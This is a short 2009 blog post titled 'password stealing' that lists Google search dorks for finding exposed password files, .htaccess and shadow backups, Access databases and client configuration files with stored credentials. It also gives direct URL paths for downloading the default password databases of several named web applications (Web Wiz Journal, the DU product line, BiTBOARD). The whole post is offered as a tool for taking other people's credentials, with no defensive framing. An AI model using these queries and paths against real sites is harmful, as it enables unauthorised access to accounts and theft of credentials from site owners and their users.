f

password stealing


“http://*:*@www” site : passwords for site, stored as the string “http://username:password@www…”
filetype:bak inurl:”htaccess|passwd|shadow|ht users” :file backups, potentially containing user names and passwords
filetype:mdb inurl:”account|users|admin|administrators|passwd|password” : mdb files, potentially containing password information
intitle:”Index of” pwd.db : pwd.db :files, potentially containing user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of : directories whose names contain the words admin and backup
“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD : WS_FTP configuration files, potentially containing FTP server access passwords


intitle:index.of trillian.ini : configuration files for the Trillian IM
eggdrop filetype:user user : configuration files for the Eggdrop ircbot
filetype:conf slapd.conf : configuration files for OpenLDAP
inurl:”wvdial.conf” intext:”password” : configuration files for WV Dial
ext:ini eudora.ini : configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb : Microsoft Access files, potentially containing user account information
intext:”powered by Web Wiz Journal” : websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:/// journal/

“Powered by DUclassified” -site:duware.com : websites using the DUclassified, DUcalendar, DUdirectory, DU-
“Powered by DUcalendar” -site:duware.com : classmate, DUdownload, DUpaypal, DUforum or DUpics applica-
“Powered by DUdirectory” -site:duware.com : tions, which by default make it possible to obtain the passwords
“Powered by DUclassmate” -site:duware.com : file – for DUclassified, just enter http:///duClassified/ _
“Powered by DUdownload” -site:duware.com : private/duclassified.mdb instead of http:///duClassified/
“Powered by DUpaypal” -site:duware.com :
“Powered by DUforum” -site:duware.com :
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com :

intext:”BiTBOARD v2.0″ “BiTSHiFTERS Bulletin Board” : websites using the Bitboard2 bulletin board application, which on default settings allows the passwords file to be obtained – enter http:///forum/admin/data _ passwd.dat instead of the default http:///forum/forum.php

Diposting oleh N.4111.M Rabu, 18 Maret 2009 di 22.34

Label:  

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)